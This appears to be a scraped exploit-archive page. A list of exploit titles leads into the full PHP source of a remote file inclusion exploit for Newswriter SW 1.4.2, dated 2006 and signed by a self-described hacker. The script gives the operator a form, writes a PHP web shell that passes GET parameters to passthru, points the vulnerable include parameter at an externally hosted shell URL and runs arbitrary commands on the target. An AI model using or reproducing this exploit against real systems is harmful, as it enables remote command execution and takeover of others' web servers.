
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
69 lines
2.1 KiB
Text
Executable file
69 lines
2.1 KiB
Text
Executable file
<?php
|
|
/* XORON - TURKISH HACKER
|
|
|
|
Thanx: str0ke, Ironfist, Preddy,
|
|
|
|
*/
|
|
|
|
$cmd = $_POST["cmd"];
|
|
$glowna = $_POST["glowna"];
|
|
$shell = $_POST["shell"];
|
|
$exp= "<title>Newswriter SW v1.4.2 Remote File Include Exploit :: XORON ::
|
|
TURKISH HACKER ::</title>"
|
|
."<style type=\"text/css\">"
|
|
."body {background-color: #006600;}"
|
|
."body,td,th {color: #FFFFFF;}"
|
|
."</style><form method=\"post\" action=\"".$glowna.$shell."?cmd=".$cmd."\">"
|
|
."<div align=\"center\"><img src=\"http://xoron.biz/teamvh4.png\"></div>"
|
|
."<p align=\"center\">script url: (ex.
|
|
http://www.site.com/[script_path]/include/main.inc.php?NWCONF_SYSTEM[server_path]=)<br>"
|
|
."<input type=\"text\" name=\"glowna\" size=\"90\"".$glowna."\">"
|
|
."<br>"
|
|
."shell url: (ex. http://www.site.com/[path]/shell.txt?) shell.txt (CHMOD
|
|
777)<br>"
|
|
."<input type=\"text\" name=\"shell\" size=\"90\"".$shell."\">"
|
|
."<br>"
|
|
."cmd: (ex. ls -la)<br>"
|
|
."<input name=\"cmd\" type=\"text\" size=\"90\"".$cmd."\">"
|
|
."<br>"
|
|
."<input type=\"submit\" value=\"Exploit\" name=\"submit\">"
|
|
."</p>"
|
|
."<p align=\"center\">Find by: <a
|
|
href=\"mailto:x0r0n@hotmail.com\">XORON</a>"
|
|
."<br>"
|
|
."<p align=\"center\"> <a
|
|
href=\"http://www.xoron.biz/\">http://www.xoron.biz/</a></p>"
|
|
."<p align=\"center\" class=\"name\"> </p>"
|
|
."<HR WIDTH=\"650\" ALIGN=\"center\">"
|
|
."<p align=\"center\"> Special Greetz: Str0ke, Ironfist, Preddy, rgod
|
|
;-)<br>"
|
|
."<br>"
|
|
."<p align=\"center\"> </p>"
|
|
."</form>";
|
|
|
|
if (!isset($_POST['submit']))
|
|
{
|
|
echo $exp;
|
|
}else{
|
|
$file = fopen ("shell.txt", "w+");
|
|
fwrite($file, '<?php
|
|
ob_clean();echo"xoron-turkish-hacker";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>');
|
|
fclose($file);
|
|
$file = fopen ($shell, "r");
|
|
if (!$file) {
|
|
echo "<p>Don't Find shell :( Insert in FTP shell.txt.\n";
|
|
exit;
|
|
}
|
|
echo $exp;
|
|
while (!feof ($file)) {
|
|
$line .= fgets ($file, 1024)."<br>";
|
|
}
|
|
$tpos1 = strpos($line, "++BEGIN++");
|
|
$tpos2 = strpos($line, "++END++");
|
|
$tpos1 = $tpos1+strlen("++BEGIN++");
|
|
$tpos2 = $tpos2-$tpos1;
|
|
$output = substr($line, $tpos1, $tpos2);
|
|
}
|
|
?>
|
|
|
|
# milw0rm.com [2006-09-27]
|